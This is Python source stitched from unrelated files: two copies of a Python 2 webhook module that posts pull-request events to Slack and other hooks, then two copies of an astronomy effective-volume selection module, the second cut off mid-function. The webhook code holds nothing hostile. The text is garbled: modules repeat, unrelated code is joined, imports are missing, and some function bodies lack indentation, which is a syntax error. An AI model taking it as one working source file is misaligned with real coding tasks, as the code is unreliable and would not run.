from vilya.models.ticket import Ticket
from vilya.libs.push_notification import send_alert
def __enter__(data):
    """Build the webhook payload for a pull-request event.

    NOTE(review): despite the dunder name this is a plain module-level
    function taking a ``data`` dict, not a context-manager method —
    presumably dispatched by name elsewhere; confirm before renaming.

    Expects ``data`` to carry ``author``, ``type``, ``ticket``, ``pullreq``
    and ``hooks``; returns ``(hook_urls, rdata)`` where ``rdata`` is the
    JSON-serialisable event payload sent to the hooks.
    """
    author = data.get('author')
    type_ = data.get('type')
    ticket = data.get('ticket')
    pullreq = data.get('pullreq')
    hooks = data.get('hooks')
    hook_urls = [hook.url for hook in hooks] if hooks else []
    from_proj = pullreq.from_proj
    to_proj = pullreq.to_proj
    from_proj_dict = {
        'url': from_proj.url,
        'name': from_proj.name,
        'description': from_proj.summary,
        'from_ref': pullreq.from_ref,
        'owner': {'name': from_proj.owner_name}
    }
    to_ref_dict = {
        'url': to_proj.url,
        'name': to_proj.name,
        'description': to_proj.summary,
        'from_ref': pullreq.to_ref,
        'owner': {'name': to_proj.owner_name}
    }
    author_dict = {'name': author.name, 'url': author.url}
    rdata = {
        'type': type_,
        'id': ticket.ticket_id,
        'author': author_dict,
        'from_proj': from_proj_dict,
        'to_ref': to_ref_dict,
        'url': ticket.url,
        'title': ticket.title,
    }
    # FIXME: 'content' is never defined; judging from the current code,
    # type_ in ('pr_merge', None), see views/uis/pull.py
    if type_ == 'pr_opened':
        rdata.update({
            'title': data.get('title'),
            'body': data.get('body'),
            'ticket_id': data.get('ticket').id,
        })
    elif type_ == 'pr_merge':
        rdata.update({
            'commit_message': data.get('commit_message'),
        })
    elif type_ == 'pr_closed':
        rdata.update({
            'content': '',
        })
    # now... data is (hook_urls, rdata)
    return hook_urls, rdata
def async_pr_hooks(args):
    """Deliver a PR event payload to every registered hook URL.

    ``args`` is the ``(hook_urls, rdata)`` pair built by ``__enter__``.
    Slack hosts get a Slack-formatted JSON body, telchar hosts (only for
    'pr_opened' events) get a telchar payload, and everything else gets a
    form-encoded ``data=<json>`` POST.  Delivery errors are printed and
    swallowed so one bad hook cannot block the rest.

    NOTE: this module is Python 2 (print statements, urllib2).
    """
    hooks, data = args
    json_data = json.dumps(data)
    for hook in hooks:
        url = urlparse(hook)
        if url.hostname and url.hostname.endswith('.slack.com'):
            slack_data = gen_slack_incoming_webhooks_data(data)
            s = requests.Session()
            try:
                s.post(hook, data=json.dumps(slack_data), timeout=30)
            except Exception as e:
                print "%s => %s" % (hook, e)
        elif data.get('type') == 'pr_opened' and url.hostname and \
                url.hostname.startswith('telchar'):
            telchar_data = gen_telchar_data(data)
            try:
                requests.post(hook, data=telchar_data, timeout=30)
            except Exception as e:
                print "%s => %s" % (hook, e)
        else:
            # Generic hooks receive the payload form-encoded under 'data'.
            try:
                u = urllib2.urlopen(hook, urllib.urlencode({'data': json_data}))
                u.read()
                u.close()
            except urllib2.URLError as e:
                print "%s => %s" % (hook, e)
def async_push_notif(args):
    """Send a push alert for the event when the target project is iCode.

    ``args`` is the ``(hook_urls, rdata)`` pair built by ``__enter__``;
    only the payload's ``title`` and ``to_ref.name`` are used.
    """
    hooks, payload = args
    alert_msg = payload.get('title')
    target_proj = payload.get('to_ref')
    if target_proj.get('name') == 'iCode':
        send_alert(alert_msg)
def gen_telchar_data(data):
    """Build the payload posted to telchar hooks for a 'pr_opened' event.

    Reads ``ticket_id`` from the payload and re-fetches the ticket and pull
    request from the database.
    """
    ticket_id = data.get('ticket_id')
    ticket = Ticket.get(ticket_id)
    pullreq = PullRequest.get_by_proj_and_ticket(
        ticket.project.id, ticket.ticket_id)
    fork_from = pullreq.from_proj.fork_from
    # NOTE(review): ``from_proj.get(fork_from)`` looks like a classmethod
    # lookup of the parent project by id via the instance — confirm against
    # the project model that this resolves the fork's origin.
    fork_from = pullreq.from_proj.get(fork_from).url if fork_from else None
    return {
        'ticket_id': ticket.ticket_id,
        'fork_from': fork_from,
        'url': pullreq.from_proj.url,
        'to_sha': pullreq.to_sha,
        'from_sha': pullreq.from_sha
    }
def gen_slack_incoming_webhooks_data(data):
    """Convert a PR event payload into a Slack incoming-webhook message.

    Returns an empty dict for event types with no Slack text mapping;
    otherwise ``{'text': ..., 'username': 'Code'}`` where the text uses
    Slack's ``<url|label>`` link syntax for the PR, project and author.
    """
    type_ = data.get('type')
    action_text_mapping = {
        'pr_opened': 'opened',
        'pr_merge': 'merged',
        'pr_closed': 'closed',
    }
    if type_ not in action_text_mapping:
        return {}
    # (Removed a dead ``text = data.get('text', '')`` assignment that was
    # unconditionally overwritten below.)
    author_dict = data.get('author', {})
    author_url = author_dict.get('url', '')
    author_name = author_dict.get('name', '')
    pr_url = data.get('url', '')
    pr_id = data.get('id', '')
    pr_title = data.get('title', '')
    to_ref_dict = data.get('to_ref', {})
    to_proj_url = to_ref_dict.get('url', '')
    to_proj_name = to_ref_dict.get('name', '')
    author_link = '<{0}{1}|{2}>'.format(DOMAIN, author_url, author_name)
    pr_link = '<{0}{1}|#{2} {3}>'.format(DOMAIN, pr_url, pr_id, pr_title)
    to_proj_link = '<{0}{1}|{2}>'.format(DOMAIN, to_proj_url, to_proj_name)
    action_text = action_text_mapping.get(type_)
    text = 'Pull Request {0} on {1} is {2} by {3}'.format(
        pr_link, to_proj_link, action_text, author_link)
    # Return directly instead of rebinding the ``data`` parameter.
    return {
        'text': text,
        'username': 'Code',
    }
from urlparse import urlparse
import json
import urllib
import urllib2
import requests
from vilya.config import DOMAIN
from vilya.models.pull import PullRequest
from vilya.models.ticket import Ticket
from vilya.libs.push_notification import send_alert
def __enter__(data):
    """Build the webhook payload for a pull-request event.

    NOTE(review): despite the dunder name this is a plain module-level
    function taking a ``data`` dict, not a context-manager method —
    presumably dispatched by name elsewhere; confirm before renaming.

    Expects ``data`` to carry ``author``, ``type``, ``ticket``, ``pullreq``
    and ``hooks``; returns ``(hook_urls, rdata)`` where ``rdata`` is the
    JSON-serialisable event payload sent to the hooks.
    """
    author = data.get('author')
    type_ = data.get('type')
    ticket = data.get('ticket')
    pullreq = data.get('pullreq')
    hooks = data.get('hooks')
    hook_urls = [hook.url for hook in hooks] if hooks else []
    from_proj = pullreq.from_proj
    to_proj = pullreq.to_proj
    from_proj_dict = {
        'url': from_proj.url,
        'name': from_proj.name,
        'description': from_proj.summary,
        'from_ref': pullreq.from_ref,
        'owner': {'name': from_proj.owner_name}
    }
    to_ref_dict = {
        'url': to_proj.url,
        'name': to_proj.name,
        'description': to_proj.summary,
        'from_ref': pullreq.to_ref,
        'owner': {'name': to_proj.owner_name}
    }
    author_dict = {'name': author.name, 'url': author.url}
    rdata = {
        'type': type_,
        'id': ticket.ticket_id,
        'author': author_dict,
        'from_proj': from_proj_dict,
        'to_ref': to_ref_dict,
        'url': ticket.url,
        'title': ticket.title,
    }
    # FIXME: 'content' is never defined; judging from the current code,
    # type_ in ('pr_merge', None), see views/uis/pull.py
    if type_ == 'pr_opened':
        rdata.update({
            'title': data.get('title'),
            'body': data.get('body'),
            'ticket_id': data.get('ticket').id,
        })
    elif type_ == 'pr_merge':
        rdata.update({
            'commit_message': data.get('commit_message'),
        })
    elif type_ == 'pr_closed':
        rdata.update({
            'content': '',
        })
    # now... data is (hook_urls, rdata)
    return hook_urls, rdata
def async_pr_hooks(args):
    """Deliver a PR event payload to every registered hook URL.

    ``args`` is the ``(hook_urls, rdata)`` pair built by ``__enter__``.
    Slack hosts get a Slack-formatted JSON body, telchar hosts (only for
    'pr_opened' events) get a telchar payload, and everything else gets a
    form-encoded ``data=<json>`` POST.  Delivery errors are printed and
    swallowed so one bad hook cannot block the rest.

    NOTE: this module is Python 2 (print statements, urllib2).
    """
    hooks, data = args
    json_data = json.dumps(data)
    for hook in hooks:
        url = urlparse(hook)
        if url.hostname and url.hostname.endswith('.slack.com'):
            slack_data = gen_slack_incoming_webhooks_data(data)
            s = requests.Session()
            try:
                s.post(hook, data=json.dumps(slack_data), timeout=30)
            except Exception as e:
                print "%s => %s" % (hook, e)
        elif data.get('type') == 'pr_opened' and url.hostname and \
                url.hostname.startswith('telchar'):
            telchar_data = gen_telchar_data(data)
            try:
                requests.post(hook, data=telchar_data, timeout=30)
            except Exception as e:
                print "%s => %s" % (hook, e)
        else:
            # Generic hooks receive the payload form-encoded under 'data'.
            try:
                u = urllib2.urlopen(hook, urllib.urlencode({'data': json_data}))
                u.read()
                u.close()
            except urllib2.URLError as e:
                print "%s => %s" % (hook, e)
def async_push_notif(args):
    """Send a push alert for the event when the target project is iCode.

    ``args`` is the ``(hook_urls, rdata)`` pair built by ``__enter__``;
    only the payload's ``title`` and ``to_ref.name`` are used.
    """
    hooks, payload = args
    alert_msg = payload.get('title')
    target_proj = payload.get('to_ref')
    if target_proj.get('name') == 'iCode':
        send_alert(alert_msg)
def gen_telchar_data(data):
    """Build the payload posted to telchar hooks for a 'pr_opened' event.

    Reads ``ticket_id`` from the payload and re-fetches the ticket and pull
    request from the database.
    """
    ticket_id = data.get('ticket_id')
    ticket = Ticket.get(ticket_id)
    pullreq = PullRequest.get_by_proj_and_ticket(
        ticket.project.id, ticket.ticket_id)
    fork_from = pullreq.from_proj.fork_from
    # NOTE(review): ``from_proj.get(fork_from)`` looks like a classmethod
    # lookup of the parent project by id via the instance — confirm against
    # the project model that this resolves the fork's origin.
    fork_from = pullreq.from_proj.get(fork_from).url if fork_from else None
    return {
        'ticket_id': ticket.ticket_id,
        'fork_from': fork_from,
        'url': pullreq.from_proj.url,
        'to_sha': pullreq.to_sha,
        'from_sha': pullreq.from_sha
    }
def gen_slack_incoming_webhooks_data(data):
    """Convert a PR event payload into a Slack incoming-webhook message.

    Returns an empty dict for event types with no Slack text mapping;
    otherwise ``{'text': ..., 'username': 'Code'}`` where the text uses
    Slack's ``<url|label>`` link syntax for the PR, project and author.
    """
    type_ = data.get('type')
    action_text_mapping = {
        'pr_opened': 'opened',
        'pr_merge': 'merged',
        'pr_closed': 'closed',
    }
    if type_ not in action_text_mapping:
        return {}
    # (Removed a dead ``text = data.get('text', '')`` assignment that was
    # unconditionally overwritten below.)
    author_dict = data.get('author', {})
    author_url = author_dict.get('url', '')
    author_name = author_dict.get('name', '')
    pr_url = data.get('url', '')
    pr_id = data.get('id', '')
    pr_title = data.get('title', '')
    to_ref_dict = data.get('to_ref', {})
    to_proj_url = to_ref_dict.get('url', '')
    to_proj_name = to_ref_dict.get('name', '')
    author_link = '<{0}{1}|{2}>'.format(DOMAIN, author_url, author_name)
    pr_link = '<{0}{1}|#{2} {3}>'.format(DOMAIN, pr_url, pr_id, pr_title)
    to_proj_link = '<{0}{1}|{2}>'.format(DOMAIN, to_proj_url, to_proj_name)
    action_text = action_text_mapping.get(type_)
    text = 'Pull Request {0} on {1} is {2} by {3}'.format(
        pr_link, to_proj_link, action_text, author_link)
    # Return directly instead of rebinding the ``data`` parameter.
    return {
        'text': text,
        'username': 'Code',
    }
import attr
import scipy.special as sp
import numpy as np
from cached_property import cached_property
from scipy.integrate import quad
from scipy.optimize import minimize, brentq
from scipy.interpolate import (
InterpolatedUnivariateSpline as spline,
RectBivariateSpline,
)
from abc import ABCMeta, abstractmethod
@attr.s
class Selection(object):
    """
    Abstract base class representing the selection function of the data used when fitting the generative DF.

    Parameters
    ----------
    vol_renorm : float
        A single number which re-normalises the total volume of the sample. Useful for creating mock observations
        tuned to a given output number of samples.
    xmin, xmax : float or array-like
        Lower/upper observation limits; converted to 1-d numpy arrays.
    """

    # NOTE(review): ``__metaclass__`` is the Python-2 mechanism and has no
    # effect under Python 3, so the @abstractmethod markers below are not
    # enforced at instantiation time there.
    __metaclass__ = ABCMeta

    vol_renorm = attr.ib(default=1.0)
    xmax = attr.ib(default=20.0, converter=lambda x: np.atleast_1d(np.array(x)))
    xmin = attr.ib(default=0.0, converter=lambda x: np.atleast_1d(np.array(x)))

    def __attrs_post_init__(self):
        # Probe Veff on a fine grid and shrink [xmin, xmax] to the region
        # where the effective volume is finite and non-zero.
        x = np.linspace(self.xmin, self.xmax, 1000)
        veff = self.Veff(x)
        if np.any(veff == 0) or np.any(np.isinf(veff)):
            indx = np.where(np.logical_and(veff > 0, np.logical_not(np.isinf(veff))))[0]
            print(
                "Warning: xmin returns Veff(xmin)=0, setting xmin, xmax to %s, %s"
                % (x[indx].min(), x[indx].max())
            )
            self.xmin = x[indx].min()
            self.xmax = x[indx].max()

    @xmin.validator
    def _xmin_validator(self, att, val):
        # xmin must be elementwise <= xmax and of matching dimensionality.
        if np.any(val > self.xmax):
            raise ValueError("xmin cannot be greater than xmax.")
        if val.size != self.xmax.size:
            raise ValueError("xmax and xmin must be of the same length")

    @abstractmethod
    def _veff_fnc(self, x):
        # Effective volume inside the observed limits; subclasses override.
        raise NotImplementedError(
            "The Selection abstract base class should not be instantiated directly"
        )

    @abstractmethod
    def _veff_extrap(self, x):
        # Default extrapolation outside the observed limits: zero volume.
        return np.zeros_like(x)

    def Veff(self, x):
        """
        The effective volume of the observation for a set of properties x.

        Parameters
        ----------
        x : array-like
            Either a 1D vector of an observed property, or a 2D vector, where the 2nd dimension corresponds to the different properties observed.

        Returns
        -------
        V : array
            A 1D vector, of the same length as x, giving the effective volume of the observation at that point in observation space.
        """
        x = np.atleast_1d(x)
        # Return vol-renormed function of veff_extrap outside observed region, and veff_fnc inside it.
        return self.vol_renorm * np.where(
            np.logical_or(x < self.xmin, x > self.xmax),
            self._veff_extrap(x),
            self._veff_fnc(x),
        )
def _veff_converter(val):
if callable(val):
return val
elif np.isscalar(val):
return lambda x: val * np.ones_like(x)
@attr.s
class SelectionVeff(Selection):
    """
    Base class for simple Selection functions, where only the effective volume function is given.

    Parameters
    ----------
    veff : callable or scalar, optional
        A function of a D-dimensional vector `x`, specifying the effective volume associated with an object of properties `x`.
        Scalars are promoted to constant functions by ``_veff_converter``.
        Default is 10 ** (2x).
    """

    # The lambda is attr.ib's positional ``default`` argument.
    veff = attr.ib(lambda x: 10 ** (2 * x), converter=_veff_converter)

    @veff.validator
    def _veff_validator(self, att, val):
        # NOTE(review): assert is stripped under ``python -O``.
        assert callable(val)

    def _veff_fnc(self, x):
        # Inside the observed limits, the user-supplied function is the
        # effective volume.
        return self.veff(x)

    def _veff_extrap(self, x):
        # Outside the limits, fall back to the base-class zero extrapolation.
        return super(SelectionVeff, self)._veff_extrap(x)
def _callable_validator(inst, att, val):
assert callable(val)
@attr.s
class SelectionVeffPoints(Selection):
    """
    Simple Selection function where only effective volume is given, for a set of discrete points

    In this case, we set xmin, xmax equal to the min/max of the passed xval.

    Parameters
    ----------
    veff : array-like
        Array of effective volumes
    xval : array-like
        Array of x-values to which veff correspond
    veff_extrap: callable, optional
        A function of one variable, x, which defines the effective volume outside the observed limits.
    """

    veff = attr.ib(default=None)
    # Transposed so rows are points and columns are observed properties.
    xval = attr.ib(default=None, converter=lambda x: np.atleast_2d(x).T)
    veff_extrap = attr.ib(
        default=None, validator=attr.validators.optional(_callable_validator)
    )

    @veff.validator
    def _veff_validator(self, att, val):
        # NOTE(review): asserts are stripped under ``python -O``; also this
        # requires a numpy array (uses .shape/.min).
        assert hasattr(val, "__len__")
        assert len(val.shape) == 1
        if val.min() < 0:
            raise ValueError("All values of selection (=Veff) must be positive.")

    @xval.validator
    def _xval_validator(self, att, val):
        assert len(val) == len(self.veff)

    # These cached properties shadow the ``xmin``/``xmax`` attr.ib fields of
    # the base class: the limits are derived from the data per dimension.
    @cached_property
    def xmin(self):
        return np.array([x.min() for x in self.xval.T])

    @cached_property
    def xmax(self):
        return np.array([x.max() for x in self.xval.T])

    @cached_property
    def _veff_fnc(self):
        # Builds (and caches) an interpolator over the tabulated points.
        n_dim = self.xval.shape[1]
        if n_dim == 1:
            # Sort the inputs so as to get a good spline
            sort_ind = np.argsort(self.xval[:, 0])
            veff = self.veff[sort_ind]
            xval = self.xval[:, 0][sort_ind]
            # Interpolate 1/Veff linearly with constant extension (ext=3).
            spl = spline(
                xval, 1 / veff, k=1, ext=3
            )  # Setup to imitate dftools R version
            return lambda x: np.where(
                x < xval.min(), self._veff_extrap(x), (1 / spl(x))
            )
        elif n_dim == 2:

            def vapprox(xval):
                spl = RectBivariateSpline(
                    self.xval[:, 0], self.xval[:, 1], 1 / self.veff, kx=1, ky=1
                )
                z = 1 / spl.ev(xval[:, 0], xval[:, 1])
                # z = 1 / (akima::interp(x[, 1], x[, 2], 1 / Veff.values, xval[1], xval[2], duplicate = 'mean'))$z
                # NOTE(review): ``np.isnan(z)`` truth-tests a scalar, but the
                # indexing above suggests xval may be a 2-D array; combined
                # with np.vectorize below this looks inconsistent — verify
                # the 2-D code path against a caller.
                if np.isnan(z):
                    return 0
                else:
                    return z

            return np.vectorize(vapprox)
        else:
            raise ValueError(
                "Linear interpolation of Veff not implemented for DF with more than 2 dimensions. Use a different selection type."
            )

    def _veff_extrap(self, x):
        # Use the user extrapolation when given, else the base-class zero.
        if self.veff_extrap is not None:
            return self.veff_extrap(x)
        else:
            return super(SelectionVeffPoints, self)._veff_extrap(x)
@attr.s
class SelectionRdep(Selection):
    """
    Base class for selection functions given as r-dependent functions

    Parameters
    ----------
    f : callable, optional
        The selection function ``f(x,r)``, giving the ratio between the expected number of detected galaxies and true
        galaxies of log-mass ``x`` and comoving distance ``r``. Normally this function is bound between 0 and 1.
        It takes the value 1 at distances, where objects of mass ``x`` are easily detected, and 0 at distances where
        such objects are impossible to detect. A rapid, continuous drop from 1 to 0 normally occurs at the limiting
        distance ``rmax``, at which a galaxy of log-mass ``x`` can be picked up. ``f(x,r)`` can never be smaller than 0,
        but values larger than 1 are conceivable, if there is a large number of false positive detections in the survey.
        The default is ``f(x,r) = erf((1-1e3*r/sqrt(10**x))*20)*0.5+0.5``, which mimics a sensitivity-limited survey
        with a fuzzy limit.
    dvdr : callable, optional
        The function ``dVdr(r)``, specifying the derivative of the survey volume ``V(r)`` as a function of comoving
        distance ``r``. This survey volume is simply the total observed volume, irrespective of the detection probability,
        which is already specified by the function ``f``. Normally, the survey volume is given by ``V(r)=Omega*r**3/3``,
        where ``Omega`` is the solid angle of the survey. Hence, the derivative is ``dVdr(r)=Omega*r**2``.
        The default is ``Omega=2.13966`` [sterradians], chosen such that the expected number of galaxies is exactly 1000
        when combined with the default selection function ``f(x,r)``.
    g : callable, optional
        Function of distance ``r`` describing the number-density variation of galaxies due to cosmic large-scale
        structure (LSS). Explicitly, ``g(r)>0`` is the number-density at ``r``, relative to the number-density without
        LSS. Values between 0 and 1 are underdense regions, values larger than 1 are overdense regions. In the absence
        of LSS, ``g(r)=1``. Note that g is automatically rescaled, such that its average value in the survey volume is 1.
    rmin,rmax : float, optional
        Minimum and maximum distance of the survey. Outside these limits the function ``f(x,r)`` will automatically be
        assumed to be 0.
    """

    f = attr.ib(
        default=lambda x, r: sp.erf((1 - 1e3 * r / np.sqrt(10 ** x)) * 20) * 0.5 + 0.5,
        validator=_callable_validator,
    )
    dvdr = attr.ib(default=lambda r: 2.13966 * r ** 2, validator=_callable_validator)
    g = attr.ib(default=None, validator=attr.validators.optional(_callable_validator))
    # Bug fix: ``np.float`` was removed in NumPy 1.24 — it was only an alias
    # of the builtin ``float``, which is the drop-in replacement.
    rmin = attr.ib(default=0, converter=float)
    rmax = attr.ib(default=20, converter=float)

    @rmax.validator
    def _rmax_validator(self, att, val):
        assert val > self.rmin

    def dVdr(self, r):
        """
        The function dvdr, re-normalised by :attr:`vol_renorm`
        """
        return self.vol_renorm * self.dvdr(r)

    @cached_property
    def _veff_no_lss_fnc(self):
        # Vectorized integral of f(x,r)*dV/dr over the survey depth.
        def fnc(xval):
            # Use the un-normalised dvdr because it will be normalised.
            return quad(lambda r: self.f(xval, r) * self.dvdr(r), self.rmin, self.rmax)[
                0
            ]

        return np.vectorize(fnc)

    def _veff_no_lss(self, x):
        """
        The effective volume without LSS
        """
        return self._veff_no_lss_fnc(x)

    @cached_property
    def _gnorm(self):
        """
        g(r) properly normalised, such that the average value of g in the survey volume is 1

        Returns
        -------
        g : callable
            Scaled g(r).
        """
        if self.g is None:
            return None
        else:
            gnorm = (
                quad(lambda r: self.dVdr(r) * self.g(r), self.rmin, self.rmax)[0]
                / quad(self.dVdr, self.rmin, self.rmax)[0]
            )
            return lambda r: self.g(r) / gnorm

    @cached_property
    def _veff_fnc(self):
        """
        The effective volume (including LSS, if any provided).
        """
        if self.g is None and hasattr(self, "_veff_lss"):
            # A previous _get_veff_lss() call cached an LSS-corrected Veff.
            return self._veff_lss
        elif self.g is not None:
            # evaluate effective volume and source count density with LSS
            def veff_lss_elemental(x):
                fct = (
                    lambda r: self.f(x, r) * self._gnorm(r) * self.dvdr(r)
                )  # Use the un-normalised dvdr because it will be normalised.
                return quad(fct, self.rmin, self.rmax)[0]

            return np.vectorize(veff_lss_elemental)
        else:
            return self._veff_no_lss

    def _veff_extrap(self, x):
        # Zero effective volume outside the observed limits (base class).
        return super(SelectionRdep, self)._veff_extrap(x)

    def _get_veff_lss(self, r, grid, p, model, weight=lambda x: np.ones_like(x)):
        """
        Generate the best-fit Veff in the presence of unknown LSS.

        Side effect: caches the result on ``self._veff_lss`` and invalidates
        the cached ``_veff_fnc`` so subsequent Veff calls use it.

        Parameters
        ----------
        p : tuple
            Parameters of the current model.
        """
        if self.g is not None:
            raise RuntimeError("You do not need to correct for LSS bias if g is known.")

        # NOTE(review): the name suggests Simpson's rule, but the 1-D branch
        # actually uses adaptive quadrature (scipy quad) — confirm intent.
        use_simpson = len(grid.xmin) == 1

        # evaluate integrals
        def integrand_lss(x, r):
            return self.f(x, r) * model.gdf(x, p)

        integral = np.empty(len(r))
        if use_simpson:
            for i in range(len(r)):
                integral[i] = quad(integrand_lss, grid.xmin, grid.xmax, args=(r[i],))[0]
        else:
            for i in range(len(r)):
                integral[i] = np.sum(integrand_lss(grid.x, r[i])) * grid.dvolume

        # make Veff.lss function
        def veff_lss_function_elemental(xval):
            f = self.f(xval, r)
            lst = f > 0
            return np.sum(f[lst] / integral[lst])

        veff_lss_scale = np.vectorize(
            veff_lss_function_elemental
        )  # Vectorize(Veff.lss.function.elemental)

        def int_ref(x):
            return self._veff_no_lss(x) * model.gdf(x, p) * weight(x)

        def int_exp(x):
            return veff_lss_scale(x) * model.gdf(x, p) * weight(x)

        if use_simpson:
            reference = quad(int_ref, grid.xmin, grid.xmax)[0]
            expectation = quad(int_exp, grid.xmin, grid.xmax)[0]
        else:
            reference = np.sum(int_ref(grid.x)) * grid.dvolume
            expectation = np.sum(int_exp(grid.x)) * grid.dvolume

        self._veff_lss = lambda x: veff_lss_scale(x) * reference / expectation
        # We must do this otherwise we just get the cached version of _veff_fnc
        del self._veff_fnc
        return self._veff_lss

    def mock_r(self, x, verbose=True):
        """
        Create a random sample of distances given a sample of x.

        Returns
        -------
        r : array-like
            Array of the same length as x given distances to each object.
        """

        # ======================================
        # find maximum of fg(x,r) = f(x,r)*g(r)
        # ======================================
        def fg(x, r):
            if self.g is not None:
                return self.f(x, r) * self._gnorm(r)
            else:
                return self.f(x, r)

        xseq = np.linspace(self.xmin, self.xmax, 100)
        rseq = np.linspace(self.rmin, self.rmax, 100)
        X, R = np.meshgrid(xseq, rseq)

        def fct(p):
            return -fg(p[0], p[1])

        q = fct((X.flatten(), R.flatten()))  # apply(xrgrid, 1, fct)
        if np.max(q) > 0:
            # Typo fix in the message: "by" -> "be".
            raise ValueError("f*g can never be smaller than 0.")
        xbegin = X.flatten()[np.argmin(q)]
        rbegin = R.flatten()[np.argmin(q)]
        opt = minimize(
            fct,
            x0=(xbegin, rbegin),
            method="L-BFGS-B",
            bounds=((self.xmin, self.xmax), (self.rmin, self.rmax)),
        )
        fgmax = -opt.fun

        if fgmax > 5 and verbose:
            print(
                "The maximum of f(r)*<g(r)> (=%f) is significantly larger than 1. Check if this is intended."
                % fgmax
            )

        # ============================================
        # sample distances (r) using cumsum algorithm
        # ============================================
        n = len(x)
        r = np.empty(n)
        dr = min(0.005, (self.rmax - self.rmin) / 1000)
        rgrid = np.arange(self.rmin, self.rmax, dr)
        cdf = np.cumsum(self.dVdr(rgrid))  # cumulative volume out to r
        qnf = spline(cdf, rgrid)  # quantile function of source count density
        lst = np.arange(n)
        m = n
        count = 0
        while m > 0 and count < 100:
            # Rejection sampling: draw r from the volume distribution, keep
            # with probability fg/fgmax.
            count += 1
            r[lst] = qnf(np.random.uniform(cdf[0], cdf[-1], m))
            rejected = fg(x[lst], r[lst]) < np.random.uniform(size=m) * fgmax
            lst = lst[rejected]
            m = len(lst)

        # sample distances (r) using deterministic uniroot algorithm to avoid iterating forever
        if m > 0:

            def get_random_r(x):
                H = np.vectorize(
                    lambda r: quad(lambda r: fg(x, r) * self.dVdr(r), self.rmin, r)[0]
                )

                def H_inv(y):
                    return brentq(lambda x: H(x) - y, a=self.rmin, b=self.rmax)

                return H_inv(np.random.uniform() * H(self.rmax))

            for i in lst:
                r[i] = get_random_r(x[i])

        return r
import scipy.special as sp
import numpy as np
from cached_property import cached_property
from scipy.integrate import quad
from scipy.optimize import minimize, brentq
from scipy.interpolate import (
InterpolatedUnivariateSpline as spline,
RectBivariateSpline,
)
from abc import ABCMeta, abstractmethod
@attr.s
class Selection(object):
    """
    Abstract base class representing the selection function of the data used when fitting the generative DF.

    Parameters
    ----------
    vol_renorm : float
        A single number which re-normalises the total volume of the sample. Useful for creating mock observations
        tuned to a given output number of samples.
    xmin, xmax : float or array-like
        Lower/upper observation limits; converted to 1-d numpy arrays.
    """

    # NOTE(review): ``__metaclass__`` is the Python-2 mechanism and has no
    # effect under Python 3, so the @abstractmethod markers below are not
    # enforced at instantiation time there.
    __metaclass__ = ABCMeta

    vol_renorm = attr.ib(default=1.0)
    xmax = attr.ib(default=20.0, converter=lambda x: np.atleast_1d(np.array(x)))
    xmin = attr.ib(default=0.0, converter=lambda x: np.atleast_1d(np.array(x)))

    def __attrs_post_init__(self):
        # Probe Veff on a fine grid and shrink [xmin, xmax] to the region
        # where the effective volume is finite and non-zero.
        x = np.linspace(self.xmin, self.xmax, 1000)
        veff = self.Veff(x)
        if np.any(veff == 0) or np.any(np.isinf(veff)):
            indx = np.where(np.logical_and(veff > 0, np.logical_not(np.isinf(veff))))[0]
            print(
                "Warning: xmin returns Veff(xmin)=0, setting xmin, xmax to %s, %s"
                % (x[indx].min(), x[indx].max())
            )
            self.xmin = x[indx].min()
            self.xmax = x[indx].max()

    @xmin.validator
    def _xmin_validator(self, att, val):
        # xmin must be elementwise <= xmax and of matching dimensionality.
        if np.any(val > self.xmax):
            raise ValueError("xmin cannot be greater than xmax.")
        if val.size != self.xmax.size:
            raise ValueError("xmax and xmin must be of the same length")

    @abstractmethod
    def _veff_fnc(self, x):
        # Effective volume inside the observed limits; subclasses override.
        raise NotImplementedError(
            "The Selection abstract base class should not be instantiated directly"
        )

    @abstractmethod
    def _veff_extrap(self, x):
        # Default extrapolation outside the observed limits: zero volume.
        return np.zeros_like(x)

    def Veff(self, x):
        """
        The effective volume of the observation for a set of properties x.

        Parameters
        ----------
        x : array-like
            Either a 1D vector of an observed property, or a 2D vector, where the 2nd dimension corresponds to the different properties observed.

        Returns
        -------
        V : array
            A 1D vector, of the same length as x, giving the effective volume of the observation at that point in observation space.
        """
        x = np.atleast_1d(x)
        # Return vol-renormed function of veff_extrap outside observed region, and veff_fnc inside it.
        return self.vol_renorm * np.where(
            np.logical_or(x < self.xmin, x > self.xmax),
            self._veff_extrap(x),
            self._veff_fnc(x),
        )
def _veff_converter(val):
if callable(val):
return val
elif np.isscalar(val):
return lambda x: val * np.ones_like(x)
@attr.s
class SelectionVeff(Selection):
    """
    Base class for simple Selection functions, where only the effective volume function is given.

    Parameters
    ----------
    veff : callable or scalar, optional
        A function of a D-dimensional vector `x`, specifying the effective volume associated with an object of properties `x`.
        Scalars are promoted to constant functions by ``_veff_converter``.
        Default is 10 ** (2x).
    """

    # The lambda is attr.ib's positional ``default`` argument.
    veff = attr.ib(lambda x: 10 ** (2 * x), converter=_veff_converter)

    @veff.validator
    def _veff_validator(self, att, val):
        # NOTE(review): assert is stripped under ``python -O``.
        assert callable(val)

    def _veff_fnc(self, x):
        # Inside the observed limits, the user-supplied function is the
        # effective volume.
        return self.veff(x)

    def _veff_extrap(self, x):
        # Outside the limits, fall back to the base-class zero extrapolation.
        return super(SelectionVeff, self)._veff_extrap(x)
def _callable_validator(inst, att, val):
assert callable(val)
@attr.s
class SelectionVeffPoints(Selection):
    """
    Simple Selection function where only effective volume is given, for a set of discrete points

    In this case, we set xmin, xmax equal to the min/max of the passed xval.

    Parameters
    ----------
    veff : array-like
        Array of effective volumes
    xval : array-like
        Array of x-values to which veff correspond
    veff_extrap: callable, optional
        A function of one variable, x, which defines the effective volume outside the observed limits.
    """

    veff = attr.ib(default=None)
    # Transposed so rows are points and columns are observed properties.
    xval = attr.ib(default=None, converter=lambda x: np.atleast_2d(x).T)
    veff_extrap = attr.ib(
        default=None, validator=attr.validators.optional(_callable_validator)
    )

    @veff.validator
    def _veff_validator(self, att, val):
        # NOTE(review): asserts are stripped under ``python -O``; also this
        # requires a numpy array (uses .shape/.min).
        assert hasattr(val, "__len__")
        assert len(val.shape) == 1
        if val.min() < 0:
            raise ValueError("All values of selection (=Veff) must be positive.")

    @xval.validator
    def _xval_validator(self, att, val):
        assert len(val) == len(self.veff)

    # These cached properties shadow the ``xmin``/``xmax`` attr.ib fields of
    # the base class: the limits are derived from the data per dimension.
    @cached_property
    def xmin(self):
        return np.array([x.min() for x in self.xval.T])

    @cached_property
    def xmax(self):
        return np.array([x.max() for x in self.xval.T])

    @cached_property
    def _veff_fnc(self):
        # Builds (and caches) an interpolator over the tabulated points.
        n_dim = self.xval.shape[1]
        if n_dim == 1:
            # Sort the inputs so as to get a good spline
